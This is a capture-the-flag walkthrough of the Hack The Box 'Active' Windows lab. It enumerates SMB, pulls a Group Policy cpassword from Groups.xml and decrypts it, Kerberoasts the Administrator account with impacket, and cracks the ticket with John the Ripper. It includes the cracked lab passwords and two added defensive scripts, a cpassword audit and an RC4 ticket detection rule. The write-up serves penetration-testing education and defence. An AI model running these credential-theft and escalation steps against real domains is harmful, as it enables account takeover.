Active is a Windows machine, and its difficulty is easy.

・Tools used
smbmap
smbclient
impacket(GetUserSPNs.py)
John the Ripper
1.Enumeration
Run AutoRecon to check for open ports.
The scan confirms that the SMB and Kerberos services are in use.

# Nmap 7.91 scan initiated Sun Dec 27 17:07:45 2020 as: nmap -vv --reason -Pn -A --osscan-guess --version-all -p- -oN /results/10.10.10.100/scans/_full_tcp_nmap.txt -oX /results/10.10.10.100/scans/xml/_full_tcp_nmap.xml 10.10.10.100
Increasing send delay for 10.10.10.100 from 0 to 5 due to 655 out of 2181 dropped probes since last increase.
Nmap scan report for 10.10.10.100
Host is up, received user-set (0.17s latency).
Scanned at 2020-12-27 17:07:46 UTC for 1308s
Not shown: 65512 closed ports
Reason: 65512 resets
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 126 Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  syn-ack ttl 126 Microsoft Windows Kerberos (server time: 2020-12-27 17:31:36Z)
135/tcp   open  msrpc         syn-ack ttl 126 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 126 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 126
464/tcp   open  kpasswd5?     syn-ack ttl 126
593/tcp   open  ncacn_http    syn-ack ttl 126 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 126
3268/tcp  open  ldap          syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 126
5722/tcp  open  msrpc         syn-ack ttl 126 Microsoft Windows RPC
9389/tcp  open  mc-nmf        syn-ack ttl 126 .NET Message Framing
47001/tcp open  http          syn-ack ttl 126 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc         syn-ack ttl 126 Microsoft Windows RPC
49153/tcp open  msrpc         syn-ack ttl 126 Microsoft Windows RPC
49154/tcp open  msrpc         syn-ack ttl 126 Microsoft Windows RPC
49155/tcp open  msrpc         syn-ack ttl 126 Microsoft Windows RPC
49157/tcp open  ncacn_http    syn-ack ttl 126 Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         syn-ack ttl 126 Microsoft Windows RPC
49169/tcp open  msrpc         syn-ack ttl 126 Microsoft Windows RPC
49171/tcp open  msrpc         syn-ack ttl 126 Microsoft Windows RPC
49182/tcp open  msrpc         syn-ack ttl 126 Microsoft Windows RPC
Aggressive OS guesses: Microsoft Windows 7 SP1 or Windows Server 2008 (95%), Microsoft Windows 7 Ultimate (95%), Microsoft Windows 8.1 (95%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 (95%), Microsoft Windows Windows 7 SP1 (95%), Microsoft Windows Vista Home Premium SP1, Windows 7, or Windows Server 2008 (95%), Microsoft Windows Vista SP1 (95%), Microsoft Windows 7 SP1 (94%), Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Server 2008 R2 (92%)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=12/27%OT=53%CT=1%CU=38526%PV=Y%DS=3%DC=T%G=Y%TM=5FE8C4
OS:7E%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=108%TI=I%CI=I%TS=7)OPS(O1=
OS:M54DNW8ST11%O2=M54DNW8ST11%O3=M54DNW8NNT11%O4=M54DNW8ST11%O5=M54DNW8ST11
OS:%O6=M54DST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y
OS:%DF=Y%T=80%W=2000%O=M54DNW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD
OS:=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%D
OS:F=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O
OS:=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK
OS:=G%RUD=G)IE(R=N)
Uptime guess: 0.026 days (since Sun Dec 27 16:52:05 2020)
Network Distance: 3 hops
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 3m44s
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 51123/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 40109/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 41936/udp): CLEAN (Timeout)
|   Check 4 (port 38631/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-12-27T17:33:06
|_  start_date: 2020-12-27T16:56:12
TRACEROUTE (using port 554/tcp)
HOP RTT       ADDRESS
1   0.05 ms   172.17.0.1
2   187.15 ms 10.10.14.1
3   187.52 ms 10.10.10.100
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Dec 27 17:29:34 2020 -- 1 IP address (1 host up) scanned in 1308.47 seconds

Use smbmap to check which files are accessible.

[!] RPC Authentication error occurred
[!] Authentication error on 10.10.10.100
[!] RPC Authentication error occurred
[!] Authentication error on 10.10.10.100
[+] IP: 10.10.10.100:445        Name: 10.10.10.100
        Disk                Permissions     Comment
        ----                -----------     -------
        ADMIN$              NO ACCESS       Remote Admin
        C$                  NO ACCESS       Default share
        IPC$                NO ACCESS       Remote IPC
        NETLOGON            NO ACCESS       Logon server share
        Replication         READ ONLY
        .\Replication\*
        dr--r--r--        0 Sat Jul 21 10:37:44 2018    .
        dr--r--r--        0 Sat Jul 21 10:37:44 2018    ..
        dr--r--r--        0 Sat Jul 21 10:37:44 2018    active.htb
        .\Replication\active.htb\*
        dr--r--r--        0 Sat Jul 21 10:37:44 2018    .
        dr--r--r--        0 Sat Jul 21 10:37:44 2018    ..
        dr--r--r--        0 Sat Jul 21 10:37:44 2018    DfsrPrivate
        dr--r--r--        0 Sat Jul 21 10:37:44 2018    Policies
        dr--r--r--        0 Sat Jul 21 10:37:44 2018    scripts
        .\Replication\active.htb\DfsrPrivate\*
        dr--r--r--        0 Sat Jul 21 10:37:44 2018    .
        dr--r--r--        0 Sat Jul 21 10:37:44 2018    ..
        dr--r--r--        0 Sat Jul 21 10:37:44 2018    ConflictAndDeleted
        dr--r--r--        0 Sat Jul 21 10:37:44 2018    Deleted
        dr--r--r--        0 Sat Jul 21 10:37:44 2018    Installing
        .\Replication\active.htb\Policies\*
        dr--r--r--        0 Sat Jul 21 10:37:44 2018    .
        dr--r--r--        0 Sat Jul 21 10:37:44 2018    ..
        dr--r--r--        0 Sat Jul 21 10:37:44 2018    {31B2F340-016D-11D2-945F-00C04FB984F9}
        dr--r--r--        0 Sat Jul 21 10:37:44 2018    {6AC1786C-016F-11D2-945F-00C04fB984F9}
        .\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\*
        dr--r--r--        0 Sat Jul 21 10:37:44 2018    .
        dr--r--r--        0 Sat Jul 21 10:37:44 2018    ..
        fr--r--r--       23 Sat Jul 21 10:38:11 2018    GPT.INI
        dr--r--r--        0 Sat Jul 21 10:37:44 2018    Group Policy
        dr--r--r--        0 Sat Jul 21 10:37:44 2018    MACHINE
        dr--r--r--        0 Sat Jul 21 10:37:44 2018    USER
        .\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\*
        dr--r--r--        0 Sat Jul 21 10:37:44 2018    .
        dr--r--r--        0 Sat Jul 21 10:37:44 2018    ..
        fr--r--r--      119 Sat Jul 21 10:38:11 2018    GPE.INI
        .\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\*
        dr--r--r--        0 Sat Jul 21 10:37:44 2018    .
        dr--r--r--        0 Sat Jul 21 10:37:44 2018    ..
        dr--r--r--        0 Sat Jul 21 10:37:44 2018    Microsoft
        dr--r--r--        0 Sat Jul 21 10:37:44 2018    Preferences
        fr--r--r--     2788 Sat Jul 21 10:38:11 2018    Registry.pol
        .\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\*
        dr--r--r--        0 Sat Jul 21 10:37:44 2018    .
        dr--r--r--        0 Sat Jul 21 10:37:44 2018    ..
        dr--r--r--        0 Sat Jul 21 10:37:44 2018    Windows NT
        .\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\*
        dr--r--r--        0 Sat Jul 21 10:37:44 2018    .
        dr--r--r--        0 Sat Jul 21 10:37:44 2018    ..
        dr--r--r--        0 Sat Jul 21 10:37:44 2018    Groups
        .\Replication\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\*
        dr--r--r--        0 Sat Jul 21 10:37:44 2018    .
        dr--r--r--        0 Sat Jul 21 10:37:44 2018    ..
        fr--r--r--       22 Sat Jul 21 10:38:11 2018    GPT.INI
        dr--r--r--        0 Sat Jul 21 10:37:44 2018    MACHINE
        dr--r--r--        0 Sat Jul 21 10:37:44 2018    USER
        .\Replication\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\*
        dr--r--r--        0 Sat Jul 21 10:37:44 2018    .
        dr--r--r--        0 Sat Jul 21 10:37:44 2018    ..
        dr--r--r--        0 Sat Jul 21 10:37:44 2018    Microsoft
        .\Replication\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\*
        dr--r--r--        0 Sat Jul 21 10:37:44 2018    .
        dr--r--r--        0 Sat Jul 21 10:37:44 2018    ..
        dr--r--r--        0 Sat Jul 21 10:37:44 2018    Windows NT
        SYSVOL              NO ACCESS       Logon server share
        Users               NO ACCESS
[!] Authentication error on 10.10.10.100

A Groups.xml file normally exists under \Groups\
(it is not visible in the smbmap output).
Retrieve Groups.xml with the smbclient command.

$ sudo smbclient -N -U "" //10.10.10.100/Replication
Try "help" to get a list of possible commands.
smb: cd \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\
smb: get Groups.xml
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (0.6 KiloBytes/sec) (average 0.6 KiloBytes/sec)

Check the userName and cpassword values in the contents of Groups.xml.
cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
userName="active.htb\SVC_TGS"

$ cat Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
kali@kali:~/hackTheBox/Active/scans$

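
A cpassword attribute like the one above is a stored credential that every account able to read the share can see, so a defender can audit a copy of the Policies tree for the same exposure. The following is an added example, not part of the original write-up: it reports where a non-empty cpassword sits without decoding it, and it scans every .xml file rather than only Groups.xml. The sample XML, its account names, the placeholder GUID folder and the function names are constructed for illustration.

```python
import tempfile
import xml.etree.ElementTree as ET
from pathlib import Path

# Constructed sample in the shape of the Groups.xml above; every value is a placeholder.
SAMPLE = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{00000000-0000-0000-0000-000000000001}">
  <User name="lab.example\\svc_demo" changed="2018-01-01 00:00:00">
    <Properties action="U" cpassword="PLACEHOLDER-NOT-A-REAL-VALUE" neverExpires="1" userName="lab.example\\svc_demo"/>
  </User>
  <User name="lab.example\\clean" changed="2018-01-01 00:00:00">
    <Properties action="U" cpassword="" neverExpires="0" userName="lab.example\\clean"/>
  </User>
</Groups>"""

def find_cpasswords(xml_data):
    """Return one finding per element whose <Properties> has a non-empty cpassword."""
    findings = []
    for parent in ET.fromstring(xml_data).iter():
        for props in parent.findall("Properties"):
            if props.get("cpassword"):  # report the exposure, never the value itself
                findings.append({
                    "account": props.get("userName") or parent.get("name"),
                    "changed": parent.get("changed"),
                    "never_expires": props.get("neverExpires") == "1",
                })
    return findings

def audit_tree(policies_root):
    """Scan every .xml file under a local copy of the Policies folder."""
    report = {}
    for path in sorted(Path(policies_root).rglob("*.xml")):
        try:
            hits = find_cpasswords(path.read_bytes())
        except ET.ParseError:
            continue  # not well-formed XML, nothing to report
        if hits:
            report[path.relative_to(policies_root).as_posix()] = hits
    return report

def demo():
    """Build a throwaway Policies tree that holds SAMPLE and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        groups = Path(tmp, "{GUID-PLACEHOLDER}", "MACHINE", "Preferences", "Groups")
        groups.mkdir(parents=True)
        (groups / "Groups.xml").write_text(SAMPLE, encoding="utf-8")
        return audit_tree(tmp)

if __name__ == "__main__":
    for rel_path, hits in demo().items():
        print(rel_path, hits)
```

Any account the audit reports should have its password changed as well as the attribute removed, because the old value remains valid for as long as the account keeps that password.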
2.Exploitation
Use gpp-decrypt to decrypt the cpassword that was obtained.

$ gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
/usr/bin/gpp-decrypt:21: warning: constant OpenSSL::Cipher::Cipher is deprecated
GPPstillStandingStrong2k18
kali@kali:~/hackTheBox/Active/scans$

Connecting to SMB with the credentials below shows read access to the Users share.
SVC_TGS
GPPstillStandingStrong2k18

$ smbmap -H 10.10.10.100 -u SVC_TGS -p GPPstillStandingStrong2k18
[+] IP: 10.10.10.100:445        Name: 10.10.10.100
        Disk                Permissions     Comment
        ----                -----------     -------
        ADMIN$              NO ACCESS       Remote Admin
        C$                  NO ACCESS       Default share
        IPC$                NO ACCESS       Remote IPC
        NETLOGON            READ ONLY       Logon server share
        Replication         READ ONLY
        SYSVOL              READ ONLY       Logon server share
        Users               READ ONLY
kali@kali:~/hackTheBox/Active/scans$

Connect to Users with smbclient and retrieve user.txt.

$ sudo smbclient -U "SVC_TGS" //10.10.10.100/Users GPPstillStandingStrong2k18
Try "help" to get a list of possible commands.
smb: \>
smb: \> cd SVC_TGS
smb: \SVC_TGS\> cd Desktop
smb: \SVC_TGS\Desktop\> ls
  .                                   D        0  Sat Jul 21 11:14:42 2018
  ..                                  D        0  Sat Jul 21 11:14:42 2018
  user.txt                            A       34  Sat Jul 21 11:06:25 2018
                10459647 blocks of size 4096. 4925465 blocks available
smb: \SVC_TGS\Desktop\> get user.txt
getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \SVC_TGS\Desktop\>

There is no access to the Administrator directory, so privilege escalation is required.

$ sudo smbclient -U "SVC_TGS" //10.10.10.100/Users GPPstillStandingStrong2k18
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Sat Jul 21 10:39:20 2018
  ..                                 DR        0  Sat Jul 21 10:39:20 2018
  Administrator                       D        0  Mon Jul 16 06:14:21 2018
  All Users                       DHSrn        0  Tue Jul 14 01:06:44 2009
  Default                           DHR        0  Tue Jul 14 02:38:21 2009
  Default User                    DHSrn        0  Tue Jul 14 01:06:44 2009
  desktop.ini                       AHS      174  Tue Jul 14 00:57:55 2009
  Public                             DR        0  Tue Jul 14 00:57:55 2009
  SVC_TGS                             D        0  Sat Jul 21 11:16:32 2018
                10459647 blocks of size 4096. 4925465 blocks available
smb: \> cd Administrator\
smb: \Administrator\> ls
NT_STATUS_ACCESS_DENIED listing \Administrator\*
smb: \Administrator\>

3.Privilege Escalation
The target host runs Kerberos, so use impacket to obtain a TGS ticket.

$ cd /opt/impacket/examples
$ python GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS:GPPstillStandingStrong2k18
/home/kali/.local/lib/python2.7/site-packages/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in a future release.
  from cryptography import x509
Impacket v0.9.22.dev1+20200929.152157.fe642b24 - Copyright 2020 SecureAuth Corporation
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2018-07-30 13:17:40.656520
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$5b05e4eb923c30cf7e15fdd64c1b6f15$...
kali@kali:/opt/impacket/examples$

Save the hash that was obtained and crack it with John the Ripper.
The password turns out to be "Ticketmaster1968".

$ cat hash.txt
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$5b05e4eb923c30cf7e15fdd64c1b6f15$e863370e766db3d4b72a1033e563ca3b4270e5fe76fe8d864b1c8aaba5341813435c4cfd603cf9609700ad1cc92f726ae5c33d6ba2df4432ce34dd110eab04719fb332d4d9564fb7899b674f27a7a3c62bcd773e00f360a642b342c6e0a8e1a2c57ebea7ef41044859d17bb8cafe005d5e860440e3e3d5178900adcb353733cf34cd0c4adec5c05268160be1bab5cb565a7e30176922b3cb9cee1b5f2b9bc1fdcaa1cea8de92c142e930cb7261c66f5f96d17c398c077585b1a31f731ed537bffd5a421d1142be614c56b884e7bb9fdb49d911d7f6b082c63177a5c15cc97b0ea60deabaa44c56bbacf69162d4a78bdc06a24afcc18ab9847223103115226bf4483b03e1c0fc13de66f2195426b4f728d4c4297076baecd1b8145ee3d2d13c18ab51cf040d6e9761a0aef799be16fc15c5fa215c97331ddb966a32632916e34f82d0a325a932cf2225854dcdebb475b6f4f514deb561a5eced41dd59cd9db1bc2872bbc7fa47869363576f0ff678c3cdd7dea3225b154e9a5c14d473a0bf5190a8a7801728361a642fe0d130290b391f6a9c2baf118a520856288ec2b884f169bbb4c55b8d30795216757cdc550912ee7c538772fc97527d26107bc49e29fe4340faa3736edb486bc8dd2f2ecab9f38d96e68a341eb3cafe71a965f4703ed53dfef425fc187c69831e466c29feb6b2e254b9b8cc3ebf3a0ec7c6396f675b13bc50955b113afd02721d16284cfbbaec69e9f37594083ac0aac76b08d176c8294dc9e1367575754d634706e1d62315429bcec64badf488ef30b1e468c1c86d66d791a6058fed40d8048eed77bd772bf802a741ee571572959d1f13a928ad69dc5a118323643c5b237434f1adf191b5d6e9499de9993153be15196db14bbd1a038ba3b3254b3e2107db81b95963753d613d1b1b0ce43171f50295ac22597d0c46ba4d90fdbde2c4841d3db4a79638f679a73aff327966f1a049956b050d18aa2f76d2bacd4f6b5957da6b074ca5d7a6bd5a5b8734cca0bbcdc631bbaa93c4508a89aa3d01f6639ab4fff56d0c772e33eb79edc98d25c76624080d89bcd71d7b28f0f6c5a71873091a1205fa2b95e4eadbed07f1af7695d8587a6326a961cd73fbfa39cec99a2a23025e2609106e08528e6a7a458bebc075bf5848721e5ad8ab3ca2973957f540c229b68d7039752abf6b8b09e720d23eed8fcac38f98ce2a36cfd967d5186c44847b795484132607932203174add04bcbc214eb50d
$ sudo john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)
1g 0:00:00:08 DONE (2020-12-28 00:18) 0.1113g/s 1173Kp/s 1173Kc/s 1173KC/s Tiffani1432..Thrash1
Use the "--show" option to display all of the cracked passwords reliably
Session completed

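
On the domain controller, a service-ticket request like the one above is recorded as Security event 4769, and the etype 23 (RC4) that john reports for the ticket is the field a detection can key on. The following detection logic is an added example, not part of the original write-up. It assumes the 4769 EventData has been exported as one JSON object per line; the log lines, account names and addresses are constructed.

```python
import json

RC4_HMAC = 0x17  # Kerberos etype 23, the type john reported for the ticket above

# Constructed 4769 records (EventData fields only), one JSON object per line.
SAMPLE_LOG = """\
{"EventID": 4769, "TargetUserName": "alice@LAB.EXAMPLE", "ServiceName": "FILESRV01$", "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "::ffff:192.0.2.10"}
{"EventID": 4769, "TargetUserName": "svc_demo@LAB.EXAMPLE", "ServiceName": "Administrator", "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "::ffff:192.0.2.66"}
{"EventID": 4769, "TargetUserName": "svc_demo@LAB.EXAMPLE", "ServiceName": "sqlsvc", "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "::ffff:192.0.2.66"}
{"EventID": 4769, "TargetUserName": "bob@LAB.EXAMPLE", "ServiceName": "krbtgt", "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "::ffff:192.0.2.11"}
{"EventID": 4769, "TargetUserName": "carol@LAB.EXAMPLE", "ServiceName": "websvc", "TicketEncryptionType": "0x17", "Status": "0x1b", "IpAddress": "::ffff:192.0.2.12"}
{"EventID": 4624, "TargetUserName": "alice", "IpAddress": "192.0.2.10"}
"""

def is_suspect(event):
    """True for an RC4 service ticket issued successfully for a user-account service."""
    if event.get("EventID") != 4769:
        return False
    service = event.get("ServiceName", "")
    if service.endswith("$") or service.lower() == "krbtgt":
        return False  # machine accounts and krbtgt use long random keys
    try:
        etype = int(event.get("TicketEncryptionType", ""), 16)
        status = int(event.get("Status", ""), 16)
    except (ValueError, TypeError):
        return False  # malformed record
    return etype == RC4_HMAC and status == 0

def detect(log_text):
    """Group suspect requests by (requesting account, source address)."""
    alerts = {}
    for line in log_text.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        if is_suspect(event):
            key = (event["TargetUserName"], event["IpAddress"])
            alerts.setdefault(key, []).append(event["ServiceName"])
    return alerts

if __name__ == "__main__":
    for (requester, source), services in detect(SAMPLE_LOG).items():
        print(f"{requester} from {source} requested RC4 tickets for: {', '.join(services)}")
```

In domains where RC4 is still in routine use this rule is noisy and needs a baseline; the lasting fix is a long random password (or a managed service account) for every account that holds an SPN, with AES-only encryption types.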
Connect with the obtained credentials and retrieve root.txt.

$ sudo smbclient -U "administrator" //10.10.10.100/Users Ticketmaster1968
Try "help" to get a list of possible commands.
smb: \> cd Administrator\Desktop\
smb: \Administrator\Desktop\> get root.txt
getting file \Administrator\Desktop\root.txt of size 34 as root.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \Administrator\Desktop\>